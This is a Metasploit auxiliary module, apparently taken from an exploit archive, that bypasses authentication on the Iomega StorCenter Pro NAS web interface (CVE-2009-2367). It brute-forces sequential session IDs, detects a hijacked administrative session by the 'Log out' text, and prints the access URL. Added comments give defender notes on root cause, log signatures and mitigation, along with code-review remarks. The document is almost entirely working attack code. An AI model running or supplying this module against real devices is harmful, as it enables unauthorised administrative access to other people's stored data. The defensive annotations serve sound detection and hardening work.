## https://sploitus.com/exploit?id=PACKETSTORM:180870
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
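# Auxiliary module for the predictable session ID weakness in the Iomega
# StorCenter Pro NAS web interface (CVE-2009-2367, OSVDB 55586).
#
# The module requests the device home page once per candidate session ID,
# counting up from 0, and treats a response containing "Log out" as evidence
# that the ID belongs to an authenticated session.
#
# Defender notes:
# - Root cause, per the description below: session IDs are incremented, so a
#   valid one can be found by enumeration. Session identifiers should be long
#   and drawn from a cryptographically secure random source.
# - In web or proxy logs this check appears as a burst of GET requests to
#   /cgi-bin/makecgi-pro?job=show_home with consecutive session_id values
#   coming from a single client.
# - Keeping the management interface off untrusted networks limits exposure
#   on devices that cannot be updated.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata and the SID_MAX option (default 100).
  def initialize
    super(
      'Name' => 'Iomega StorCenter Pro NAS Web Authentication Bypass',
      'Description' => %q{
        The Iomega StorCenter Pro Network Attached Storage device web interface increments sessions IDs,
        allowing for simple brute force attacks to bypass authentication and gain administrative
        access.
      },
      'References' => [
        [ 'OSVDB', '55586' ],
        [ 'CVE', '2009-2367' ],
      ],
      'Author' => [ 'aushack' ],
      'License' => MSF_LICENSE
    )

    register_options(
      [
        OptInt.new('SID_MAX', [true, 'Maximum Session ID', 100])
      ]
    )
  end

  # Probes session IDs 0 through SID_MAX - 1 and stops at the first hit.
  #
  # Note that Integer#times never yields SID_MAX itself, so the option is an
  # exclusive upper bound even though it is labelled "Maximum Session ID".
  #
  # A connection-level failure (refused, unreachable, connect timeout) aborts
  # the whole run; a per-request timeout or broken pipe only skips that ID.
  def run
    datastore['SID_MAX'].times do |x|
      print_status("Trying session ID #{x}")

      # The second argument (25) is passed to send_request_raw alongside the
      # request options; presumably the per-request timeout in seconds.
      res = send_request_raw(
        {
          'uri' => "/cgi-bin/makecgi-pro?job=show_home&session_id=#{x}",
          'method' => 'GET'
        }, 25
      )

      # NOTE(review): the match runs against the whole serialized response
      # (headers and body), and "Log out" is a loose marker. A hit should be
      # confirmed manually before it is recorded as a finding.
      next unless res && res.to_s.match?(/Log out/)

      print_good("Found valid session ID number #{x}!")
      print_status("Browse to http://#{rhost}:#{rport}/cgi-bin/makecgi-pro?job=show_home&session_id=#{x}")
      break
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      print_error("Unable to connect to #{rhost}:#{rport}")
      break
    rescue ::Timeout::Error, ::Errno::EPIPE => e
      # Previously swallowed silently. Surface it in verbose mode so an
      # incomplete sweep is not mistaken for a clean negative result.
      vprint_error("Session ID #{x} skipped: #{e.class}")
    end
  end
end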